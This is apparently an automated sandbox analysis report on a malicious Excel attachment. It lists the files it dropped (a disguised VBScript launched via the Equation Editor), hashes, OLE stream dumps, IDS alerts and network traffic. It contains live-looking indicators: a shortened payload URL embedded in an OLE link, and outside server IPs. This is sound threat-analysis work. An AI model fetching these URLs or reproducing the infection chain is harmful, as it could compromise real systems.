                SHA-512:BD116CAF3ACA40A5B90168A022C84923DB51630FA0E62E46020B71B8EB9613EAE776D476B0C6DE0D5F15642A74ED857765150F406937FBA5CB995E9FCDAC81AE
                Malicious:false
                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):415848
                Entropy (8bit):3.5938135611796738
                Encrypted:false
                SSDEEP:3072:HHGzwfkYF6hNe4VTdRnTT8w4TWQZqbT0WgR2pKKtPt2uS7Ut4QzS18f8d6bb/g5g:0wfkYFNZqP0Hd0t/
                MD5:8917F751C05D497A4F29BF454BC19F48
                SHA1:31EAE7E64E0C6062FDD6C4DB81E31A2BE2C3A000
                SHA-256:2E0E8C2013DDE6B8F98ADF7A38208C6360AFB3D4F78408D903598250D2733CEC
                SHA-512:8D3B2E2BA380B2118A5DBA00615CBCCCAED76D7DAEE84B0D82B2CE4F6B9A26B61B0D8F7F8C1A6DB90EFBE729D08D6B972B94DFE041AFCB9D9D8682FB998575F7
                Malicious:true
                Preview:..'.....'. .C.o.p.y.r.i.g.h.t. .(.c.). .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n... . .A.l.l. .r.i.g.h.t.s. .r.e.s.e.r.v.e.d.......'.....'. .V.B.S.c.r.i.p.t. .S.o.u.r.c.e. .F.i.l.e.....'.....'. .S.c.r.i.p.t. .N.a.m.e.:. .w.i.n.r.m...v.b.s.....'.........O.p.t.i.o.n. .E.x.p.l.i.c.i.t.........'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.....'. .E.r.r.o.r. .c.o.d.e.s.....p.r.i.v.a.t.e. .c.o.n.s.t. .E.R.R._.O.K. . . . . . . . . . . . . . .=. .0.....p.r.i.v.a.t.e. .c.o.n.s.t. .l.a.m.p.e.j.a.n.t.e. .=. .1.........'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.....'. .M.e.s.s.a.g.e.s.....p.r.i.v.a.t.e. .c.o.n.s.t. .L._.O.N.L.Y.C.S.C.R.I.P.T._.M.e.s.s.a.g.e. . . . . .=. .".C.a.n. .b.e. .e.x.e.c.u.t.e.d. .o.n.l.y. .b.y. .c.s.c.r.i.p.t...e.x.e...".....p.r.i.v.a.t.e. .c.o.n.s.t. .L._.U.N.K.O.P.N.M._.M.e.s.s.a.g.e. . . . . . . . . .=. .".U.n.k.n.o.w.n. .o.p.e.r.a.t.i.o.n. .n.a.m.e.:. .".....p.r.i.v.a.t.e. .c.o.n.s.t. .L._.O.P._.M.e.s.s.a.g.e. . . . . . . . . . . . . . .=. .".O.p.e.r.a.t.i.o.n. .-. .".....
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 07:25:07 2024, Security: 1
                Category:dropped
                Size (bytes):1088000
                Entropy (8bit):7.9821086142995386
                Encrypted:false
                SSDEEP:24576:D2S7Pe4a7uUC3QLO5KmLaQPFO4vkw7zf8dJD2whU:T7P0uUC3QL6a+HvPMJD2whU
                MD5:6569097957353D553389963ED0BD658B
                SHA1:DAC24AA0CD63B389868C14CE8649147CBA4E71DA
                SHA-256:69F25494C2D2D350C08BDBDAAA553004115DF54B1BC9685FADC2F1D5231CA5CC
                SHA-512:D8424ABFC62077883A9E6059BC54A5982384CC62659CB70AAFAAE85486F7026342ED58876B8297A2D26120A807FFCFF1755C9F399AF00B15FE9C56E448CFAF84
                Malicious:true
                Preview:......................>.......................................................................................u.......w.......y.......{...............................................................................................................................................................................................................................................................................................................................................................................................K................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 07:25:07 2024, Security: 1
                Category:dropped
                Size (bytes):1088000
                Entropy (8bit):7.9821086142995386
                Encrypted:false
                SSDEEP:24576:D2S7Pe4a7uUC3QLO5KmLaQPFO4vkw7zf8dJD2whU:T7P0uUC3QL6a+HvPMJD2whU
                MD5:6569097957353D553389963ED0BD658B
                SHA1:DAC24AA0CD63B389868C14CE8649147CBA4E71DA
                SHA-256:69F25494C2D2D350C08BDBDAAA553004115DF54B1BC9685FADC2F1D5231CA5CC
                SHA-512:D8424ABFC62077883A9E6059BC54A5982384CC62659CB70AAFAAE85486F7026342ED58876B8297A2D26120A807FFCFF1755C9F399AF00B15FE9C56E448CFAF84
                Malicious:false
                Preview:......................>.......................................................................................u.......w.......y.......{...............................................................................................................................................................................................................................................................................................................................................................................................K................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:false
                Preview:[ZoneTransfer]....ZoneId=0
                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Jul 25 03:44:04 2024, Security: 1
                Entropy (8bit):7.976582520990171
                TrID:
                • Microsoft Excel sheet (30009/1) 47.99%
                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                File name:#U00d6DEME TAVS#U0130YES#U0130.xls
                File size:1'104'896 bytes
                MD5:75bfdd13f1ba9517907d20630398fe5e
                SHA1:20049b39f7b1f74ba4cd4dabf064f61d5fe28ce7
                SHA256:0658815d79e2d6c10e9ca7c2d3f4a355403ad7bfe1f1c6a4d69d50a1d3dd7b04
                SHA512:9fa3adf1f38c258d44f33edcf712ae581d04e8520ac33f3a7723241d7b0590a3d1224c97b777179eebbf847519f59a79864639f396db764bf40a03c534daa8ff
                SSDEEP:24576:62S7Pe4a7uUC3QLO5K+tN8hzSHkLrfSwRh641/AICv:I7P0uUC3QLgtHmV
                TLSH:173523147B83CF52D18B0AB5EAC6915F15799E365B3282873B52B31FEE30378258364B
                File Content Preview:........................>...................................3...................................................v.......x.......z.......|......................................................................................................................
                Icon Hash:276ea3a6a6b7bfbf
                Document Type:OLE
                Number of OLE Files:1
                Has Summary Info:
                Application Name:Microsoft Excel
                Encrypted Document:True
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:True
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:False
                Flash Objects Count:0
                Contains VBA Macros:True
                Code Page:1252
                Author:
                Last Saved By:
                Create Time:2006-09-16 00:00:00
                Last Saved Time:2024-07-25 02:44:04
                Creating Application:Microsoft Excel
                Security:1
                Document Code Page:1252
                Thumbnail Scaling Desired:False
                Contains Dirty Links:False
                Shared Document:False
                Changed Hyperlinks:False
                Application Version:786432
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                VBA File Name:Sheet1.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W y . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 96 c9 57 79 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Attribute VB_Name = "Sheet1"
                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                VBA File Name:Sheet2.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0 .
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 96 c9 eb 99 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Attribute VB_Name = "Sheet2"
                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                VBA File Name:Sheet3.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . o . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 96 c9 6f 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Attribute VB_Name = "Sheet3"
                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                VBA File Name:ThisWorkbook.cls
                Stream Size:985
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 96 c9 a7 bf 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Attribute VB_Name = "ThisWorkbook"
                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.25248375192737
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:\x5DocumentSummaryInformation
                CLSID:
                File Type:data
                Stream Size:244
                Entropy:2.889430592781307
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                General
                Stream Path:\x5SummaryInformation
                CLSID:
                File Type:data
                Stream Size:200
                Entropy:3.2503503175049815
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . r . < . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                General
                Stream Path:MBD000177E1/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:99
                Entropy:3.631242196770981
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:MBD000177E1/Package
                CLSID:
                File Type:Microsoft Excel 2007+
                Stream Size:544527
                Entropy:7.971990487615386
                Base64 Encoded:True
                Data ASCII:P K . . . . . . . . . . ! . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 d4 fe 94 9a b9 01 00 00 c0 06 00 00 13 00 d1 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cd 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:MBD000177E2/\x1Ole
                CLSID:
                File Type:data
                Stream Size:538
                Entropy:6.325482802013981
                Base64 Encoded:False
                Data ASCII:. . . . v W e R . z . . . . . . . . . . . . 2 . . . y . . . K . . . . . h . t . t . p . : . / . / . t . n . y . . . w . t . f . / . 4 . G . s . . . [ g . s @ . 9 * & ; G . . c . G R . . " / . 6 G t . w . . u . . - b h 0 Y . % N . . . . . L . % V { I } < 7 [ E y \\ g . T I } . . s - . 3 . y 7 . e @ . s . . I $ * J j . ~ / & H D p . [ Z h 4 . . s { u V 5 . U ! . " z g ! . . > . D ! % . 7 I % : - g . Y w . . @ 3 . . 5 C . . . . . . . . . . . . . . . . . . . k . p . a . F . t . v . Q . v . b . o . 7 . 5 . y .
                Data Raw:01 00 00 02 b3 76 57 65 52 00 82 7a 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 2e 01 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 74 00 6e 00 79 00 2e 00 77 00 74 00 66 00 2f 00 34 00 47 00 73 00 00 00 c2 5b 67 04 dd 73 40 e4 db d6 d2 db be 39 ef e1 b0 2a 26 e7 3b 47 10 0a 90 81 86 e2 c5 63 e7 b6 11 47 52 c7 0f 9b f1 83 00 22
                General
                Stream Path:Workbook
                CLSID:
                File Type:Applesoft BASIC program data, first line number 16
                Stream Size:537110
                Entropy:7.999296500287962
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . ! . L . B . . Q * r . ~ . . z M t . t R . z . @ . . . . . . . y . . . \\ . p . C P . + F . % w V 1 . R 5 z . K v . . | . . ? n . + D . s { l - k T 8 . O b X [ . D , . d + E . . ( & . . . . V 0 I B . . . a . . . z . . . = . . . { . . . . . % . l . . K . $ k 8 . . . ' . . . . . . . . z v . . . . { . . . . . . . . [ = . . . 7 5 m S * i . [ e @ . . . . . . . " . . . { . . . . . . . . ! . . . S 1 . . . . . G 7 > 7 P $ . W . . N 2 [ . 1 . . . } e C v 8 B g '
                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 ab e7 21 87 92 a4 fe 0e ce 4c a5 03 42 d6 9b d3 13 d6 51 b1 2a 72 12 d6 7e e8 d0 ae c7 91 a1 7a 4d e6 74 c7 8b 74 52 ad dc 81 7a db e6 80 02 40 e1 00 02 00 b0 04 c1 00 02 00 f8 79 e2 00 00 00 5c 00 70 00 43 9b 50 e1 bb d1 13 2b 46 10 25 92 c2 77 56 88 ca 31 00 52 83 35 7a cf 89 ad 90 bc 4b c6
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECT
                CLSID:
                File Type:ASCII text, with CRLF line terminators
                Stream Size:531
                Entropy:5.299358462064816
                Base64 Encoded:True
                Data ASCII:I D = " { D F 5 F F B 7 F - B 7 1 1 - 4 F A 1 - 9 9 0 5 - A 2 8 4 B B E A 3 F 4 6 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 7 8 5 A 7 3 1 A F 5 1 4 7 5 5 4
                Data Raw:49 44 3d 22 7b 44 46 35 46 46 42 37 46 2d 42 37 31 31 2d 34 46 41 31 2d 39 39 30 35 2d 41 32 38 34 42 42 45 41 33 46 34 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                CLSID:
                File Type:data
                Stream Size:104
                Entropy:3.0488640812019017
                Base64 Encoded:False
                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                CLSID:
                File Type:data
                Stream Size:2644
                Entropy:3.99197869103924
                Base64 Encoded:True
                Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                CLSID:
                File Type:data
                Stream Size:553
                Entropy:6.362087362498996
                Base64 Encoded:True
                Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . O h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
                Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 4f b2 b2 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                2024-07-26T08:24:50.462673+0200TCP2049038ET MALWARE Malicious Base64 Encoded Payload In Image8049171198.46.176.133192.168.2.22
                2024-07-26T08:24:51.617188+0200TCP2020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M18049172192.227.225.166192.168.2.22
                2024-07-26T08:24:49.422588+0200TCP2047750ET MALWARE Base64 Encoded MZ In Image8049171198.46.176.133192.168.2.22
                TimestampSource PortDest PortSource IPDest IP
                Jul 26, 2024 08:24:34.557415962 CEST4916580192.168.2.22188.114.97.3
                Jul 26, 2024 08:24:34.562217951 CEST8049165188.114.97.3192.168.2.22
                Jul 26, 2024 08:24:34.562386990 CEST4916580192.168.2.22188.114.97.3
                Jul 26, 2024 08:24:34.562410116 CEST4916580192.168.2.22188.114.97.3
                Jul 26, 2024 08:24:34.567337990 CEST8049165188.114.97.3192.168.2.22
                Jul 26, 2024 08:24:35.704056978 CEST8049165188.114.97.3192.168.2.22
                Jul 26, 2024 08:24:35.707958937 CEST4916580192.168.2.22188.114.97.3
                Jul 26, 2024 08:24:35.711606026 CEST4916680192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:35.716501951 CEST8049166192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:35.717964888 CEST4916680192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:35.717964888 CEST4916680192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:35.722902060 CEST8049166192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:36.201911926 CEST8049166192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:36.201997995 CEST8049166192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:36.202012062 CEST8049166192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:36.202192068 CEST4916680192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:36.202192068 CEST4916680192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:36.202529907 CEST8049166192.227.225.166192.168.2.22
